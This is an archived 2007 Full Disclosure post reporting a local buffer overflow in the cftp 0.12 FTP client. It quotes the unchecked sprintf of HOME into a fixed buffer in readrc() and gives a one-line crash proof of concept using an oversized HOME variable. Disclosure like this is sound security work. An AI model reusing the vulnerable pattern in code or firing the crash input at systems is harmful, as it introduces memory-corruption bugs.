Full Disclosure mailing list archives
cftp 0.12 (readrc) Local buffer overflow vulnerability
From: starcadi <starcadi () gmail com>
Date: Mon, 19 Mar 2007 22:52:13 +0100
Description: CFTP is Comfortable FTP, a full screen ftp client. Supported are FTP both with active and passive data connections, IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for authorization and connection encryption). Found local buffer overflow in readrc() with sprintf() with no sizelen control. source: http://ftp.giga.or.at/pub/nih/cftp/ Source error: int readrc(char **userp, char **passp, char **hostp, char **portp, char **wdirp, int check_alias) { FILE *f; char b[8192], *p, *tok, *q, *home; char *user, *pass, *host, *port, *wdir; if ((home=getenv("HOME")) == NULL) home = ""; sprintf(b, "%s/.cftprc", home); if ((f=fopen(b, "r")) == NULL) { if (errno == ENOENT) return 0; return -1; } [..] } error in sprintf(), no sizelen control in getenv(). Proof of concept: $ export HOME=`perl -e "print 'A'x8200"` $ cftp Segmentation fault $ -- .original http://intel.shacknet.nu/ ~ starcadi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- cftp 0.12 (readrc) Local buffer overflow vulnerability starcadi (Mar 19)
- Re: cftp 0.12 (readrc) Local buffer overflow vulnerability 3APA3A (Mar 20)